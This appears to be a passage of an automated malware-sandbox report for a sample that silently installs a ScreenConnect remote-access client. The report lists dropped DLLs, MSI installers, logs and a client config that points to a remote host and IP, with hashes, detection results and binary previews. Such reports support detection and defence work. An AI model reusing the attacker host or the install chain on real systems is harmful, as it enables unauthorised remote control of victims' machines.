MD5:14E7489FFEBBB5A2EA500F796D881AD9
SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):11776
Entropy (8bit):5.273875899788767
Encrypted:false
SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
MD5:73A24164D8408254B77F3A2C57A22AB4
SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1721856
                                                                                                                                                                    Entropy (8bit):6.639085961200334
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                                                                    MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                                                                    SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                                                                    SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                                                                    SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                    Process:C:\Users\user\Desktop\f53WqfzzNt.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {14C6E684-39F9-9C17-EDF7-878C827CA860}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9961472
                                                                                                                                                                    Entropy (8bit):7.957250026307833
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:GwJ4t1h0cG5FGJRPxow8O+wJ4t1h0cG5FwJ4t1h0cG5iwJ4t1h0cG5jwJ4t1h0cW:TWh0cGwVWh0cGAWh0cGpWh0cGGWh0cG
                                                                                                                                                                    MD5:EB678C7AB43E21B2E9BD38B8DB7EE8C0
                                                                                                                                                                    SHA1:C059F88FFF2D111C8EFEAED4BCA0FEDD2145CF88
                                                                                                                                                                    SHA-256:3B5C41C0F4BF1D37DA3D9E61593DA64EA192BAEAB4A9036A24F3D268A3F8A39B
                                                                                                                                                                    SHA-512:F9D8207EFE37BF66A38B1B4DE6699F46EEC892785DB00BD471B6BB7837FA90DA6F00F976E2AB60BB58E9B8ACE73D3339622376A61F3F98A75F310C28E89C7385
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...........................................................}...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {14C6E684-39F9-9C17-EDF7-878C827CA860}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9961472
                                                                                                                                                                    Entropy (8bit):7.957250026307833
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:GwJ4t1h0cG5FGJRPxow8O+wJ4t1h0cG5FwJ4t1h0cG5iwJ4t1h0cG5jwJ4t1h0cW:TWh0cGwVWh0cGAWh0cGpWh0cGGWh0cG
                                                                                                                                                                    MD5:EB678C7AB43E21B2E9BD38B8DB7EE8C0
                                                                                                                                                                    SHA1:C059F88FFF2D111C8EFEAED4BCA0FEDD2145CF88
                                                                                                                                                                    SHA-256:3B5C41C0F4BF1D37DA3D9E61593DA64EA192BAEAB4A9036A24F3D268A3F8A39B
                                                                                                                                                                    SHA-512:F9D8207EFE37BF66A38B1B4DE6699F46EEC892785DB00BD471B6BB7837FA90DA6F00F976E2AB60BB58E9B8ACE73D3339622376A61F3F98A75F310C28E89C7385
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...........................................................}...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {14C6E684-39F9-9C17-EDF7-878C827CA860}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9961472
                                                                                                                                                                    Entropy (8bit):7.957250026307833
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:GwJ4t1h0cG5FGJRPxow8O+wJ4t1h0cG5FwJ4t1h0cG5iwJ4t1h0cG5jwJ4t1h0cW:TWh0cGwVWh0cGAWh0cGpWh0cGGWh0cG
                                                                                                                                                                    MD5:EB678C7AB43E21B2E9BD38B8DB7EE8C0
                                                                                                                                                                    SHA1:C059F88FFF2D111C8EFEAED4BCA0FEDD2145CF88
                                                                                                                                                                    SHA-256:3B5C41C0F4BF1D37DA3D9E61593DA64EA192BAEAB4A9036A24F3D268A3F8A39B
                                                                                                                                                                    SHA-512:F9D8207EFE37BF66A38B1B4DE6699F46EEC892785DB00BD471B6BB7837FA90DA6F00F976E2AB60BB58E9B8ACE73D3339622376A61F3F98A75F310C28E89C7385
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...........................................................}...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):423662
                                                                                                                                                                    Entropy (8bit):6.577643816442937
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:8uH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvX:8uH2anwohwQUv5uH2anwohwQUvX
                                                                                                                                                                    MD5:261D61FCEE2029AD277DF1624FB2C5ED
                                                                                                                                                                    SHA1:29E4ACC17B994BE2BD6354DC764A2DAE6B36FEB0
                                                                                                                                                                    SHA-256:49DEFEF28E9B98E26F088949B89CC28A6332FD9B91555BB982C314B23FFDC3FF
                                                                                                                                                                    SHA-512:2F10417FAF8984F7BDFD6D81714413A8371F9212EC9E78569E5EC076FF5DD96D45D2FDBCC6DA07107B9327986BF8C8F45D1027F3A6AF641A9B357271BBB7DBD3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSICBE0.tmp, Author: Joe Security
                                                                                                                                                                    Preview:...@IXOS.@.....@.R.Y.@.....@.....@.....@.....@.....@......&.{14C6E684-39F9-9C17-EDF7-878C827CA860}'.ScreenConnect Client (a532d472f1ff1d4e)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a532d472f1ff1d4e)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{CF9AE42D-A542-A5BE-DF54-2B1FF488B5E3}^.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{9509AE8A-E997-4132-8CAB-BAFE89DF77F6}f.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{8B377FBF-DB9A-CC34-86C5-7376F38045E2}c.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileMa
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):207360
                                                                                                                                                                    Entropy (8bit):6.573348437503042
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):207360
                                                                                                                                                                    Entropy (8bit):6.573348437503042
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                    Entropy (8bit):1.1716762355752257
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:JSbX72Fj0AGiLIlHVRpIh/7777777777777777777777777vDHFDtR7rl0i8Q:J6QI5wNKF
                                                                                                                                                                    MD5:7F7ADC82FA8D929780C207261F03790E
                                                                                                                                                                    SHA1:67B29E5941005E53ED45C2CABD900A7064A97685
                                                                                                                                                                    SHA-256:C861C1740307AD97AF94E20E9EF3D06D8C3178241EFE2C0705A89C929323484B
                                                                                                                                                                    SHA-512:DB3DFCBAE5F1BFA81173905BCA7ADF6356EDDFA4F25BE1CFFA4DF948E3879D4B3C46B9141788A38A109FFEFA87B4AFE523BE4A89DF44ACA08DEBDBB6AB8A89E9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                    Entropy (8bit):1.8095888546286913
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:18PhMuRc06WXzuFT5J9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAX:YhM1zFTs9p4fed/4G3f9FDME
                                                                                                                                                                    MD5:42308293DC812DF71F43C377513FDC6E
                                                                                                                                                                    SHA1:10C83D98875F566BD28C64F6E083F4CC811906D8
                                                                                                                                                                    SHA-256:2C7EED1657BDD2737F64551414D337DA88944DE0429DBB841DFF47479F0C76ED
                                                                                                                                                                    SHA-512:22695837D539F68F6134EFD04B159A88BBD6C8A0982C8E37B8ADEDFE550BC680F302FC110C76154D03E26EE47C0784AF06D64E3A623EDB13B13FFB49675D17EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):435
                                                                                                                                                                    Entropy (8bit):5.289734780210945
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                                                                                                    MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                                                                                                    SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                                                                                                    SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                                                                                                    SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):432221
                                                                                                                                                                    Entropy (8bit):5.375179125495492
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauy:zTtbmkExhMJCIpErr
                                                                                                                                                                    MD5:A5AD77CB5B31EA089864272EBCCAA27D
                                                                                                                                                                    SHA1:2A98A156CAA578B37ADE6687AE56689E5C54F177
                                                                                                                                                                    SHA-256:FE606FD17E1B6E909000EC9D652AA8510301840DCA6A8FF0FFEA302A4E82BAB3
                                                                                                                                                                    SHA-512:DFD3C8CFC660D72F09E12DA3A4E084403AC36473B61A9ACF86139B13C1412CF6FF29999491502F34B230F41A51C0C346C6C82BF8B5F4A8A3B4DD3F253596C47C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):565
                                                                                                                                                                    Entropy (8bit):5.0135821896782335
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOmMx0dhEiBK5/vXbAa3xT:2dL9hK6E46YPEARvH
                                                                                                                                                                    MD5:18310D6528D8AABB05F6BEB3A87E42F4
                                                                                                                                                                    SHA1:0E5F5AC4AFA956B032525FA957B818BFC92B636E
                                                                                                                                                                    SHA-256:D638D3B1ED691195382A2D89328A64F69C4774112A3E46E67C68A49C23117D40
                                                                                                                                                                    SHA-512:055B0026D0F6973A9EAA01D39F0D4E6B300A535889AD1447B76F2DAB98556870BEE5D36DFC4F4A0F1F45A9B8DF892B30F73CCEC6458408C3E86BDC382D4958E7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>sc.connectprotocol.es=38.69.12.167-03%2f12%2f2024%2015%3a23%3a31</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):565
                                                                                                                                                                    Entropy (8bit):5.0135821896782335
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOmMx0dhEiBK5/vXbAa3xT:2dL9hK6E46YPEARvH
                                                                                                                                                                    MD5:18310D6528D8AABB05F6BEB3A87E42F4
                                                                                                                                                                    SHA1:0E5F5AC4AFA956B032525FA957B818BFC92B636E
                                                                                                                                                                    SHA-256:D638D3B1ED691195382A2D89328A64F69C4774112A3E46E67C68A49C23117D40
                                                                                                                                                                    SHA-512:055B0026D0F6973A9EAA01D39F0D4E6B300A535889AD1447B76F2DAB98556870BEE5D36DFC4F4A0F1F45A9B8DF892B30F73CCEC6458408C3E86BDC382D4958E7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>sc.connectprotocol.es=38.69.12.167-03%2f12%2f2024%2015%3a23%3a31</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                    Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1590
                                                                                                                                                                    Entropy (8bit):5.363907225770245
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                                                                    MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                                                                    SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                                                                    SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                                                                    SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):512
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):32768
Entropy (8bit):1.4270231635734074
Encrypted:false
SSDEEP:48:0pkuyth8FXzvT5aUh9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAdF:UkIRToz9p4fed/4G3f9FDME
MD5:E8F4366B6D0D20FF93DD451C1CDA4FAD
SHA1:E517A01AA68331A5EFA199F279CED46881ACD1DE
SHA-256:31075347213B51170D6F2DBC532C41A5DBBF4501C37318E37F10B6B3018C9629
